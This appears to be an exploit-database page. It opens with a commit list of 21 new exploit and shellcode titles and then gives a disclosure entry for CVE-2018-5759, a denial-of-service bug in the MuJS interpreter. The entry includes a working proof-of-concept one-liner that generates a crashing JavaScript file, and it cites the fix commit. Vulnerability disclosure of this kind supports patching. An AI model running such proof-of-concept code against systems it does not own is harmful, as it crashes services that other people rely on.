acaa042761
21 changes to exploits/shellcodes Artifex MuJS 1.0.2 - Denial of Service Artifex MuJS 1.0.2 - Integer Overflow BMC BladeLogic 8.3.00.64 - Remote Command Execution Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal PACSOne Server 6.6.2 DICOM Web Viewer - SQL Injection Gnew 2018.1 - Cross-Site Request Forgery Nexpose < 6.4.66 - Cross-Site Request Forgery Joomla! Component JS Support Ticket 1.1.0 - Cross-Site Request Forgery Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download Task Rabbit Clone 1.0 - 'id' SQL Injection TSiteBuilder 1.0 - SQL Injection Hot Scripts Clone - 'subctid' SQL Injection Multilanguage Real Estate MLM Script 3.0 - 'srch' SQL Injection Buddy Zone 2.9.9 - SQL Injection Netis WF2419 Router - Cross-Site Request Forgery KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery Linux/x86 - Egghunter Shellcode (12 Bytes) Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)
16 lines
No EOL
573 B
Text
16 lines
No EOL
573 B
Text
# Exploit Title: DoS caused by the interactive call between two functions
|
|
# Date: 2018-01-16
|
|
# Exploit Author: Andrea Sindoni - @invictus1306
|
|
# Vendor: Artifex (https://www.artifex.com/)
|
|
# Software Link: https://github.com/ccxvii/mujs
|
|
# Version: Mujs - 228719d087aa5e27dcd8627c4acf7273476bdbca
|
|
# Tested on: Linux
|
|
# CVE : CVE-2018-5759
|
|
|
|
Simple poc:
|
|
# python -c "print 'func%d'*80000" > poc.js
|
|
# mujs poc.js
|
|
|
|
Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1 (
|
|
http://git.ghostscript.com/?p=mujs.git;a=commit;h=4d45a96e57fbabf00a7378b337d0ddcace6f38c1
|
|
) |